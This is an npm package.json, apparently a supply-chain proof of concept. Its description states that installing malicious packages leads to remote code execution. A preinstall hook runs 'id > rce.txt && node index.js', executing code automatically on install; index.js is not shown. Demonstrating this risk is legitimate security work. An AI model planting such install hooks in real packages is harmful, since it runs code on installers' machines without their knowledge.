{
    "name": "this-is-critical",
    "version": "1.3.37",
    "description": "Installing malicious packages from npm leads to RCE (a critical bug).",
    "main": "index.js",
    "scripts": {
      "test": "",
      "preinstall": "id > rce.txt && node index.js"
    },
    "author": "SupplyShark",
    "license": "ISC"
  }